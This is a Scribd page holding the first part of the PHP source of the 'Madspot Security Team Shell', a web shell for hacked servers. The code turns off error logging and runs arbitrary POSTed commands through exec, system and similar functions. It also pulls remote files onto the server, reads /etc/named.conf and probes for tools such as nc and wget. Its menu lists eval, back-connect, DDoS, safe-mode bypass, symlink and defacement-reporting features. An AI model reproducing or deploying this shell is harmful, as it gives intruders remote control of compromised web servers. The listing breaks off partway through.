Scribd
Upload
178 views

Code Source Du Shell Madspot

This PHP code defines functions and variables for a file management shell. It sets PHP settings, starts the session, gets the current working directory and drives. It then defines functions for executing commands, downloading files and displaying the header.

Uploaded by

Mora SOW
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
178 views

Code Source Du Shell Madspot

This PHP code defines functions and variables for a file management shell. It sets PHP settings, starts the session, gets the current working directory and drives. It then defines functions for executing commands, downloading files and displaying the header.

Uploaded by

Mora SOW
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
You are on page 1/ 15

1 <?

php
2
3 /**
4 * @author Ikram ALI
5 * @copyright 2012
6 */
7 @define('VERSION','1.0');
8 @error_reporting(E_ALL ^ E_NOTICE);
9 @session_start();
10 @ini_set('error_log',NULL);
11 @ini_set('log_errors',0);
12 @ini_set('max_execution_time',0);
13 @set_time_limit(0);
14 @set_magic_quotes_runtime(0);
15
16 if(get_magic_quotes_gpc()) {
17 function madstripslashes($array) {
18 return is_array($array) ? array_map('madstripslashes', $array) :
stripslashes($array);
19 }
20 $_POST = madstripslashes($_POST);
21 }
22 $default_action = 'FilesMan';
23 $default_use_ajax = true;
24 $default_charset = 'Windows-1251';
25 if (strtolower(substr(PHP_OS,0,3))=="win")
26 $sys='win';
27 else
28 $sys='unix';
29
30 $home_cwd = @getcwd();
31 if(isset($_POST['c']))
32 @chdir($_POST['c']);
33
34 $cwd = @getcwd();
35 if($sys == 'win')
36 {
37 $home_cwd = str_replace("\\", "/", $home_cwd);
38 $cwd = str_replace("\\", "/", $cwd);
39 }
40
41 if($cwd[strlen($cwd)-1] != '/' )
42 $cwd .= '/';
43
44
45 function madEx($in) {
46 $out = '';
47 if (function_exists('exec')) {
48 @exec($in,$out);
49 $out = @join("\n",$out);
50 } elseif (function_exists('passthru')) {
51 ob_start();
52 @passthru($in);
53 $out = ob_get_clean();
54 } elseif (function_exists('system')) {
55 ob_start();
56 @system($in);
57 $out = ob_get_clean();
58 } elseif (function_exists('shell_exec')) {
59 $out = shell_exec($in);
60 } elseif (is_resource($f = @popen($in,"r"))) {
61 $out = "";
62 while(!@feof($f))
63 $out .= fread($f,1024);
64 pclose($f);
65 }
66 return $out;
67 }
68 $down=@getcwd();
69 if($sys=="win")
70 $down.='\\';
71 else
72 $down.='/';
73 if(isset($_POST['rtdown']))
74 {
75 $url = $_POST['rtdown'];
76 $newfname = $down. basename($url);
77 $file = fopen ($url, "rb");
78 if ($file) {
79 $newf = fopen ($newfname, "wb");
80 if ($newf)
81 while(!feof($file)) {
82 fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
83 }
84 }
85
86 if ($file) {
87 fclose($file);
88 }
89 if ($newf) {
90 fclose($newf);
91 }
92 }
93
94
95
96 function madhead()
97 {
98 if(empty($_POST['charset']))
99 $_POST['charset'] = $GLOBALS['default_charset'];
100
101 $freeSpace = @diskfreespace($GLOBALS['cwd']);
102 $totalSpace = @disk_total_space($GLOBALS['cwd']);
103 $totalSpace = $totalSpace?$totalSpace:1;
104
105 $on="<font color=#0F0> ON </font>";
106 $of="<font color=red> OFF </font>";
107 $none="<font color=#0F0> NONE </font>";
108 if(function_exists('curl_version'))
109 $curl=$on;
110 else
111 $curl=$of;
112 if(function_exists('mysql_get_client_info'))
113 $mysql=$on;
114 else
115 $mysql=$of;
116 if(function_exists('mssql_connect'))
117 $mssql=$on;
118 else
119 $mssql=$of;
120
121 if(function_exists('pg_connect'))
122 $pg=$on;
123 else
124 $pg=$of;
125 if(function_exists('oci_connect'))
126 $or=$on;
127 else
128 $or=$of;
129 if(@ini_get('disable_functions'))
130 $disfun=@ini_get('disable_functions');
131 else
132 $disfun="All Functions Enable";
133 if(@ini_get('safe_mode'))
134 $safe_modes="<font color=red>ON</font>";
135 else
136 $safe_modes="<font color=#0F0 >OFF</font>";
137 if(@ini_get('open_basedir'))
138 $open_b=@ini_get('open_basedir');
139 else
140 $open_b=$none;
141
142
143 if(@ini_get('safe_mode_exec_dir'))
144 $safe_exe=@ini_get('safe_mode_exec_dir');
145 else
146 $safe_exe=$none;
147 if(@ini_get('safe_mode_include_dir'))
148 $safe_include=@ini_get('safe_mode_include_dir');
149 else
150 $safe_include=$none;
151 if(!function_exists('posix_getegid'))
152 {
153 $user = @get_current_user();
154 $uid = @getmyuid();
155 $gid = @getmygid();
156 $group = "?";
157 } else
158 {
159 $uid = @posix_getpwuid(posix_geteuid());
160 $gid = @posix_getgrgid(posix_getegid());
161 $user = $uid['name'];
162 $uid = $uid['uid'];
163 $group = $gid['name'];
164 $gid = $gid['gid'];
165 }
166
167
168 $cwd_links = '';
169 $path = explode("/", $GLOBALS['cwd']);
170 $n=count($path);
171 for($i=0; $i<$n-1; $i++) {
172 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
173 for($j=0; $j<=$i; $j++)
174 $cwd_links .= $path[$j].'/';
175 $cwd_links .= "\")'>".$path[$i]."/</a>";
176 }
177
178 $drives = "";
179 foreach(range('c','z') as $drive)
180 if(is_dir($drive.':\\'))
181 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]
</a> ';
182
183
184
185
186
187 echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
188 <html xmlns="http://www.w3.org/1999/xhtml">
189 <head>
190 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
191 <link href="http://www.madspot.net/favicon.ico" rel="icon" type="image/x-
icon"/>
192 <title>Madspot Security Team Shell</title>
193 <style type="text/css">
194 <!--
195 .whole {
196 background-color: #CCC;
197 height:auto;
198 width: auto;
199 margin-top: 10px;
200 margin-right: 10px;
201 margin-left: 10px;
202 }
203 .header {
204 height: auto;
205 width: auto;
206 border: 7px solid #CCC;
207 color: #999;
208 font-size: 12px;
209 font-family: Verdana, Geneva, sans-serif;
210 background-color: #000;
211 }
212 .header a {color:#0F0; text-decoration:none;}
213 span {
214 font-weight: bolder;
215 color: #FFF;
216 }
217 #meunlist {
218 font-family: Verdana, Geneva, sans-serif;
219 color: #FFF;
220 background-color: #000;
221 width: auto;
222 border-right-width: 7px;
223 border-left-width: 7px;
224 border-top-style: solid;
225 border-right-style: solid;
226 border-bottom-style: solid;
227 border-left-style: solid;
228 border-top-color: #CCC;
229 border-right-color: #CCC;
230 border-bottom-color: #CCC;
231 border-left-color: #CCC;
232 height: auto;
233 font-size: 12px;
234 font-weight: bold;
235 border-top-width: 0px;
236 }
237 .whole #meunlist ul {
238 padding-top: 5px;
239 padding-right: 5px;
240 padding-bottom: 7px;
241 padding-left: 2px;
242 text-align:center;
243 list-style-type: none;
244 margin: 0px;
245 }
246 .whole #meunlist li {
247 margin: 0px;
248 padding: 0px;
249 display: inline;
250 }
251 .whole #meunlist a {
252 font-family: arial, sans-serif;
253 font-size: 14px;
254 text-decoration:none;
255 font-weight: bold;
256 color: #fff;
257 clear: both;
258 width: 100px;
259 margin-right: -6px;
260 padding-top: 3px;
261 padding-right: 15px;
262 padding-bottom: 3px;
263 padding-left: 15px;
264 border-right-width: 1px;
265 border-right-style: solid;
266 border-right-color: #FFF;
267 }
268 .whole #meunlist a:hover {
269 color: #000;
270 background: #fff;
271 }
272
273 .foot {
274 font-family: Verdana, Geneva, sans-serif;
275 background-color: #000;
276 margin: 0px;
277 padding: 0px;
278 width: 100%;
279 text-align: center;
280 font-size: 12px;
281 color: #CCC;
282 border-right-width: 7px;
283 border-left-width: 7px;
284 border-bottom-width: 7px;
285 border-bottom-style: solid;
286 border-right-style: solid;
287 border-right-style: solid;
288 border-left-style: solid;
289 border-top-color: #CCC;
290 border-right-color: #CCC;
291 border-bottom-color: #CCC;
292 border-left-color: #CCC;
293 }';
294 if(is_writable($GLOBALS['cwd']))
295 {
296 echo ".foottable {
297 width: 300px;
298 font-weight: bold;
299 }";}
300 else
301 {
302 echo ".foottable {
303 width: 300px;
304 font-weight: bold;
305 background-color:red;
306 }
307 .dir {
308 background-color:red;
309 }
310 ";
311 }
312 echo '.main th{text-align:left;}
313 .main a{color: #FFF;}
314 .main tr:hover{background-color:red;}
315 .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
316 .bigarea{ width:99%; height:300px; }
317 </style>
318
319 ';
320
321 echo "<script>
322 var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
323 var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
324 var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
325 var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!
==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
326 var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!
==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
327 var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!
==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
328 var d = document;
329 function set(a,c,p1,p2,p3,charset) {
330 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
331 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
332 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
333 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
334 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
335 if(charset!=null)d.mf.charset.value=charset;else
d.mf.charset.value=charset_;
336 }
337 function g(a,c,p1,p2,p3,charset) {
338 set(a,c,p1,p2,p3,charset);
339 d.mf.submit();
340 }</script>";
341
342
343 echo '
344 </head>
345
346 <body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0"
marginheight="0">
347 <div class="whole">
348 <form method=post name=mf style="display:none;">
349 <input type=hidden name=a>
350 <input type=hidden name=c>
351 <input type=hidden name=p1>
352 <input type=hidden name=p2>
353 <input type=hidden name=p3>
354 <input type=hidden name=charset>
355 </form>
356 <div class="header"><table width="100%" border="0" align="lift">
357 <tr>
358 <td width="3%"><span>Uname:</span></td>
359 <td colspan="2">'.substr(@php_uname(), 0, 120).'</td>
360 </tr>
361 <tr>
362 <td><span>User:</span></td>
363 <td>'. $uid . ' [ ' . $user . ' ] <span> Group: </span>' . $gid . ' [ ' . $group . ' ]
</td>
364 <td width="14%" rowspan="8"><img alt=""
src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEABEM
DQ8NCxEPDg8TEhEVGiscGhgYGjUmKB8rPzdCQT43PDtFTmNURUleSzs8VnZ
XXmdqb3BvQ1N6g3lsgmNtb2sBEhMTGhcaMxwcM2tHPEdra2tra2tra2tra2tra2tra2t
ra2tra2tra2tra2tra2tra2tra2tra2tra2tra2tra//AABEIAI8AjwMBEQACEQEDEQH/xAGi
AAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgsQAAIBAwMCBAM
FBQQEAAABfQECAwAEEQUSITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDN
icoIJChYXGBkaJSYnKCkqNDU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ
2hpanN0dXZ3eHl6g4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFx
sfIycrS09TV1tfY2drh4uPk5ebn6Onq8fLz9PX29/j5+gEAAwEBAQEBAQEBAQAA
AAAAAAECAwQFBgcICQoLEQACAQIEBAMEBwUEBAABAncAAQIDEQQFI
TEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY
3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYq
Sk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6e
ry8/T19vf4+fr/2gAMAwEAAhEDEQA/AOOtLJrkFt21RWc6nKZVKigWv7I/6bfpW
br+Rh9aXYP7IH/Pb9KXt/If1lN7FmPw4zoGM4GexFZyxiXQtVvIjbw5cj7ssZ/MVSx
cC/aozLq1ltJfLmXDV0wmpK6LjJPYYEAHznFUUG2P+8fyoAAsf94/lQBILbPQmg
BGtZAMgZFAEBGDQBej0yWSMPuUZ5waydWKZjKvGLHf2TN/fSl7ZGf1qIDSZj
0Zcmk68UNYmLZYHh27IzujH41DxcDT2qA+HbsAkNGfoaaxUGHtUZc8LwSGO
QYYV0RkpK6NE7q5s6YALJCO5Oa5K3xHn4l+/Yt1kcw5OWUe9J7DjubHSuKWr
OxJBUj9TG8RIn2dXKguCAD+Nehgm9Ua0jmZD+8b616JuMoAkh/1q0AXl60ATL
QBQuwEujgdulAG7GMRIPYV58tWeTVfvMdSMyezANwuRWc72Lp7mnXIdYUkI
5TxJ/yEB/uCvZw38NHTS+Esad/x5R/j/Osqvxs4cT8ZZrM5hyffX6ilL4So7mxXC9zs
QUDMbxGR9njHqwr0MH1NaRzMn+sb616BuMoAkg/1q0AXkoAmWgCjff8AHz+
AoA3Iv9Un+6K4JbnkVPiY6pMyxZf8fC/Q1nU2NaW5pVxnUFMDlfEv/IQX/cr18L/
DOin8JPp3/HlH+P8AOs6vxs4cT8ZZrM5hyffX6ilL4So7mxXC9zsQUhmH4k+7Cfev
RwXU1pHOS/6xvrXoG4ygCSD/AFq0AXloAmWgCjff8fX4CgDbh5gj/wB0fyrglueR
V+Jj6kzLFl/x8L9DWdTY1pbmlXGdQUwOV8S/8hBf9yvXwv8ADOin8JNpp/0JPx/n
UVvjOHE/GWqyOYcn31+tTLYqO5sVxS3OxBS8gMTxH/qov94V6OD0ubUjm5f9
Y31r0DcZQBJB/rVoAvLQBMtAFG+/4+vwFAG3B/qIv9wfyrgn8R5NX42PqbmRYs
v+PgfQ1nU2NKe5pVxnWFMGcr4l/wCQgv8AuV6+F/hnRS+Egsr9bePy3UkDpirqU
+Z3Iq0efUtjVLcjncD9Ky9jI5/qrvuH9p23q/5UewkP6q0y2niG3VAGVmI74xWLwk
maqk0B8SQdoXz9aPqT7j9kzJ1HUmvplYjai9BXXRoqmrGsI8pXkgLEspBB5zmtixn
kP7fnQAqwurA8cUAWlYDqDQBIsi+hJFAFK6fM24/e747UAaFpqEIhVZGKlQB0r
nnSu9Dkq4fmd0T/ANoW3/PT9Kz9jIy+rSHJqdujhll5HtSdCTQ44eSZcGvWmOSc+1
YfVJGypyEfX7RUJXJPpTWDl1GqTuc7qN4b25MpGBjAFehThyRsbRVkT6baJNuk
lG5RwFzU1KjjojKtV5EXhYWo/wCWQ/OsPazOX6zIX7Ba/wDPIfmaPazD6zItwaJa
PGHdMZ7A1hLFTTNlVkyT+wrL+4fzqfrcynUZlazpsVnGHjGATxXZQrOotTSnPm
I7OxjaNXkUnIzTqVWtEZVa7i7ItfYbb/nl+prP2szD6zMBp9sTgRc/U0nWmkNYiTL
y6FZ7RuU574NYvFTNlVkL/YVlj7rfnU/W5j9qzA1O0S1vBCowOPoa9ClPnhc2hL
mVypLsDkKuBmtSxmR/doAVQGYALyaALK2yHrnNADzZIR8pOaAKUiGNyrdR
QBr6R/x7t/vVy1/iOHF7ov1gcQGkxrc2I/8AVr9K4pbnZHYdUjMXxN/x5x/71d+C3Z
rS3IrT/j1i/wB0VpP4mcVf42S1G5iSW/8Ar4/rUS2Lhua1cTOxbBRoLc5vxIP9LhNer
g/gOilsYkn32+tdhqMoAlt/9Z+FAF1KAJloAoX/APx8H6CgDQ0j/j3b61y1/iOHFbov
1gcQHpSY47mxH/q1+griludkdh1SUYvib/j0j/3q7sF8TNaW5Fa/8esX+6K1n8TOGv8
AGS1BiSW/
+vj+tTP4S4bmtXCdgUwOd8SY+0Qetepg/gZvS2MKT/WN9a7TUZSAlt/9Z+FAF1K
AJloAo6gf3+PYUAaOlDFmD6k1yVviODFbou1icYdqTHHc2I/9Wv0riludsdh1IZi+J
v8Aj0j/AN6u3BfEzSluRWv/AB6xf7orWfxM4q/xktQYklv/AK+P61M/hLhua1cJ2BT
A5zxJ/wAfMFepg/gZvS2MOT/WH612moykBLb/AOs/CgC6tAEy0AUL/wD4+PwF
AGjpLg2xTup5rlrp3ucOKWqZerA4w7UnsC3NeLmJSPSuKe52R2H1JRi+Jv8Aj0jHf
dXfgr3ZpS3IrT/j1i/3RWlT4mcVf42S1BiSW/EyE9M1Er8pcPiNauN6HWFIbOd8SD/
SYT+Ferg17upvS2MKX/WN9a7DUZQBJAf3goAvLQBMtAFC/Obgj0AoAS0uWtp
NyjcCMEVMoKSsROCmrMttq0naICsvYox+rRBdWk/ijU0ewiL6tEsx+IHiXasRx7m
s3hIspUEuo/8A4SST/niKX1SPcr2SM/UNRe9PK4+prenTUFoaRikOtr6WJFXydwA
wO2acqaZE6MZak/8AaT/8+x/Os/YLuZfVoiHVcHBgIP1o9ggWGSLC6/cAACDIHr
Wf1SLLVFDjr85Uj7Pg44NCwkd7j9kjJvLuW4lBcEAHIBrphBRVkaqKSA+XIN2xw
SOgHFWMZ5Sf3X/KgBfLQdFf8qAJRIR2b/vmgBTcMqnAYf8AAaAKLsXYsepoA
BxzQAu9vWgBQzEgZoAuIigAEZPvQBKsaH+AUAQz26CRMcZI/nQBFcyN5rAH
ABwBQBB5jf3jQA5WdmA3HmgC4ijoRmgCVUQ9VoAjnQCIqRnaQVJ9D2oAqSy
NvIz09KAI/Mb+8aAHxlncDcaALaovpQBKI0PBUc0AZ9zH5UzL27UAR9qAEoAd
H99frQBfWgCZaAGXH+si+o/nQBQuf9e/1NAEVAD4f9Yv1oAvLQBMlADLn7j/A
PAf50AZsn+sP1oAbQBLb/6z8KALq0ASrQBR1D/j4z7CgCuaAEoAcn31+tAF9etAE
y0AMuPvxfUfzoAoXP8Ar3+poAioAfD/AK1aALy0ATLQAy4+4/8AwH+dAGbJ99v
rQA2gCWD/AFn4UAXVoAmWgCjqH+v/AAoArGgBKAHJ99frQBfWgCZaAGXH
34vqP50AULn/AF7/AFNAEVAD4f8AWrQBfWgCVaAGXH3H/wCA/wA6AM2T7
7fWgBtAEsH+s/CgC6tAEy0AUdQP7/HsKAK3agBKAFU4YGgC+nIyOlAE6igCK5
dVdMkfKRn86AKVxhpWYdCc5oAioAfGdrqaAL6e1AEqdaAI7gjy3O4DlR160AZ8
oxIfrQAygCSEhZAT0oAvLQBKOBk8UAZ124knYr06UAQ0AGaAFBIoAcJXHRs
UAL58v980AMZixyxzQAquV6UAO80/3V/KgA80/wB1fyoAUXDjpgUAL9pk9aAI
3cucmgBwmYAAgHHqKADzT/dX8qADzT/dX8qAF+0P2wKAGtK7DBY4oAZQB/
/Z" /></td>
365 </tr>
366 <tr>
367 <td><span>PHP:</span></td>
368 <td>'.@phpversion(). ' <span> Safe Mode:'.$safe_modes.'</span></td>
369 </tr>
370 <tr>
371 <td><span>Our IP:</span></td>
372 <td>'.@$_SERVER["SERVER_ADDR"].' <span>Server IP:</span>
'.@$_SERVER["REMOTE_ADDR"].'</td>
373 </tr>
374 <tr>
375 <td><span>WEBS:</span></td>
376 <td width="76%">';
377
378 if($GLOBALS['sys']=='unix')
379 {
380 $d0mains = @file("/etc/named.conf");
381 if(!$d0mains)
382 {
383 echo "CANT READ named.conf";
384 }
385 else
386 {
387 $count;
388 foreach($d0mains as $d0main)
389 {
390 if(@ereg("zone",$d0main))
391 {
392 preg_match_all('#zone "(.*)"#', $d0main, $domains);
393 flush();
394 if(strlen(trim($domains[1][0])) > 2){
395 flush();
396 $count++;
397 }
398 }
399 }
400 echo "$count Domains";
401 }
402 }
403 else{ echo"CANT READ |Windows|";}
404
405 echo '</td>
406 </tr>
407 <tr>
408 <td height="16"><span>HDD:</span></td>
409 <td>'.madSize($totalSpace).' <span>Free:</span>' . madSize($freeSpace) . '
['. (int) ($freeSpace/$totalSpace*100) . '%]</td>
410 </tr>';
411
412 if($GLOBALS['sys']=='unix' )
413 {
414 if(!@ini_get('safe_mode'))
415 {
416
417 echo '<tr><td height="18" colspan="2"><span>Useful : </span>';
418 $userful =
array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','loca
te','suidperl');
419 foreach($userful as $item)
420 if(madWhich($item))
421 echo $item.',';
422 echo '</td>
423 </tr>
424 <tr>
425 <td height="0" colspan="2"><span>Downloader:</span>';
426
427 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
428 foreach($downloaders as $item2)
429 if(madWhich($item2))
430 echo $item2.',';
431 echo '</td>
432 </tr>';
433
434 }
435 else
436 {
437 echo '<tr><td height="18" colspan="2"><span>useful:</span>';
438 echo '--------------</td>
439 </tr><td height="0" colspan="2"><span>Downloader:
</span>-------------</td>
440 </tr>';
441 }
442 }
443 else
444 {
445 echo '<tr><td height="18" colspan="2"><span>Window:</span>';
446 echo madEx('ver');
447 echo '</td>
448 </tr> <tr>
449 <td height="0" colspan="2"><span>Downloader: </span>-------------</td>
450 </tr>';
451
452 }
453
454
455 echo '<tr>
456 <td height="16" colspan="2"><span>Disabled functions:</span>'.
$disfun.'</td>
457 </tr>
458 <tr>
459 <td height="16" colspan="2"><span>cURL:'.$curl.' MySQL:'.$mysql.'
MSSQL:'.$mssql.' PostgreSQL:'.$pg.' Oracle: </span>'.$or.'</td><td
width="15%">'.base64_decode("PGEgaHJlZj0iaHR0cDovL3d3dy5tYWRzcG90Lm5
ldCIgdGFyZ2V0PSJfYmxhbmsiPjxzcGFuPjxmb250IGNvbG9yPSIjMEYwIj4mbmJz
cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtNQURTUE9ULk5FVDwv
Zm9udD48L3NwYW4+PC9hPg==").'</td>
460 </tr>
461 <tr>
462 <td height="11" colspan="3"><span>Open_basedir:'.$open_b.'
Safe_mode_exec_dir:'.$safe_exe.' Safe_mode_include_dir:'.$safe_include.'</td>
463 </tr>
464 <tr>
465 <td height="11"><span>Server </span></td>
466 <td colspan="2">'.@getenv('SERVER_SOFTWARE').'</td>
467 </tr>';
468 if($GLOBALS[sys]=="win")
469 {
470 echo '<tr>
471 <td height="12"><span>DRIVE:</span></td>
472 <td colspan="2">'.$drives.'</td>
473 </tr>';
474 }
475
476 echo '<tr>
477 <td height="12"><span>PWD:</span></td>
478 <td colspan="2">'.$cwd_links.' <a href=# onclick="g(\'FilesMan\',\'' .
$GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><font color=red >|CURRENT|
</font></a></td>
479 </tr>
480 </table>
481 </div>
482 <div id="meunlist">
483 <ul>
484 <li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">HOME</a></li>
485
486 <li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')">PROCESS</a></li>
487 <li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')">EVAL</a></li>
488 <li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')">SQL</a></li>
489 <li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')">HASH</a></li>
490 <li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')">CONNECT</a></li>
491 <li><a href="#" onclick="g(\'zoneh\',null,\'\',\'\',\'\')">ZONE-H</a></li>
492 <li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')">DDOS</a></li>
493 <li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
494 <li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')">SYMLINK</a></li>
495 <li><a href="#" onclick="g(\'spot\',null,\'\',\'\',\'\')">MADSPOT</a></li>
496 <li><a href="#" onclick="g(\'selfrm\',null,\'\',\'\',\'\')">KIll C0de</a></li>
497 </ul>
498
499 </div>
500 ';
501
502 }
503
504 function madfooter()
505 {
506
507 echo "<table class='foot' width='100%' border='0' cellspacing='3'
cellpadding='0' >
508 <tr>
509 <td width='17%'><form
onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>__MK
FILE__</span><br><input class='dir' type=text name=f value=''><input type=submit
value='>>'></form></td>
510 <td width='21%'><form
onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>__MK
DIR__</span><br><input class='dir' type=text name=d value=''><input type=submit
value='>>'></form></td>
511 <td width='22%'><form
onsubmit=\"g('FilesMan',null,'delete',this.del.value);return
false;\"><span>__DELETE__</span><br><input class='dir' type=text name=del
value=''><input type=submit value='>>'></form></td>
512 <td width='19%'><form
onsubmit=\"g('FilesTools',null,this.f.value,'chmod');return
false;\"><span>__CHMOD__</span><br><input class='dir' type=text name=f
value=''><input type=submit value='>>'></form></td>
513 </tr>
514 <tr>
515 <td colspan='2'><form onsubmit='g(null,this.c.value,\"\");return
false;'><span>__CHANGE DIR__</span><br><input class='foottable' type=text
name=c value='".htmlspecialchars($GLOBALS['cwd'])."'><input type=submit
value='>>'></form></td>
516 <td colspan='2'><form method='post' ><span>__HTTP
DOWNLOAD__</span><br><input class='foottable' type=text name=rtdown
value=''><input type=submit value='>>'></form></td>
517 </tr>
518 <tr>
519 <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);return
false;\"><span>__EXECUTE__</span><br><input class='foottable' type=text
name=c value=''><input type=submit value='>>'></form></td>
520 </tr>
521 <tr>
522 <td colspan='4'><form method='post' ENCTYPE='multipart/form-data'>
523 <input type=hidden name=a value='FilesMAn'>
524 <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
525 <input type=hidden name=p1 value='uploadFile'>
526 <input type=hidden name=charset value='" .
(isset($_POST['charset'])?$_POST['charset']:'') . "'>
527 <span>Upload file:</span><br><input class='toolsInp' type=file
name=f><br /><input type=submit value='>>'></form></td>
528 </tr>
529 </table>
530 </div>
531 </body>
532 </html>
533 ";
534
535 }
536 if (!function_exists("posix_getpwuid") &&
(strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
537 function posix_getpwuid($p) {return false;} }
538 if (!function_exists("posix_getgrgid") &&
(strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
539 function posix_getgrgid($p) {return false;} }
540
541 function madWhich($p) {
542 $path = madEx('which ' . $p);
543 if(!empty($path))
544 return $path;
545 return false;
546 }
547
548
549
550 function madSize($s) {
551 if($s >= 1073741824)
552 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
553 elseif($s >= 1048576)
554 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
555 elseif($s >= 1024)
556 return sprintf('%1.2f', $s / 1024 ) . ' KB';
557 else
558 return $s . ' B';

You might also like